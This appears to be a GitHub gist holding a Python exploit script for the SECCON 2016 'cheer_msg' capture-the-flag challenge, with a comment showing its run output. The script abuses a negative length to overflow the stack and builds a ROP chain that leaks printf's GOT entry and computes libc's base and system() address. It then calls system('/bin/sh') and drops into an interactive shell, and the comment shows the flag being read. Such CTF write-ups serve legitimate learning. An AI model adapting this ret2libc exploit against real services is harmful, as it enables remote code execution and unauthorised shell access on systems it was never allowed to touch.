Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
#!/usr/bin/python
# -*- coding: utf-8 -*-
import socket
import struct
import telnetlib
def sock(remoteip, remoteport):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((remoteip, remoteport))
f = s.makefile('rw', bufsize=0)
return s, f
def read_until(f, delim='\n'):
data = ''
while not data.endswith(delim):
data += f.read(1)
return data
def p(a):
return struct.pack("<I", a)
def u(a):
return struct.unpack("<I", a)[0]
def shell(s):
t = telnetlib.Telnet()
t.sock = s
t.interact()
# libc_printf_offset = 0x49020
# libc_system_offset = 0x3a940
libc_printf_offset = 0x4d410
libc_system_offset = 0x40310
getline_addr = 0x80486bd
popret = 0x8048409
pop2ret = 0x80487ae
printf_plt = 0x8048430
fgets_plt = 0x8048440
printf_got_addr = 0x804a010
# s, f = sock('localhost', 4444)
s, f = sock('cheermsg.pwn.seccon.jp', 30527)
f.write('-144\n')
read_until(f, 'Name >> ')
payload = ''
payload += p(printf_plt)
payload += p(popret)
payload += p(printf_got_addr)
payload += p(getline_addr)
payload += p(pop2ret)
payload += p(printf_got_addr)
payload += p(16)
payload += p(printf_plt)
payload += p(0xdeadbeaf)
payload += p(printf_got_addr+4)
f.write(payload+'\n')
read_until(f, 'Message : \n')
printf_got = u(f.read(4))
libc_base = printf_got - libc_printf_offset
system_addr = libc_base + libc_system_offset
print 'printf_got: {:#x}'.format(printf_got)
print 'libc base: {:#x}'.format(libc_base)
print 'system addr: {:#x}'.format(system_addr)
f.write(p(system_addr) + '/bin/sh\n')
shell(s)
@otms61
Owner
otms61 commented Dec 10, 2016

$ python cheer_msg.py
printf_got: 0xf75c1410
libc base: 0xf7574000
system addr: 0xf75b4310
�|]�Vf��`��o_�
ls
cheer_msg
flag.txt
run.sh
cat flag.txt
SECCON{N40.T_15_ju571c3}

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment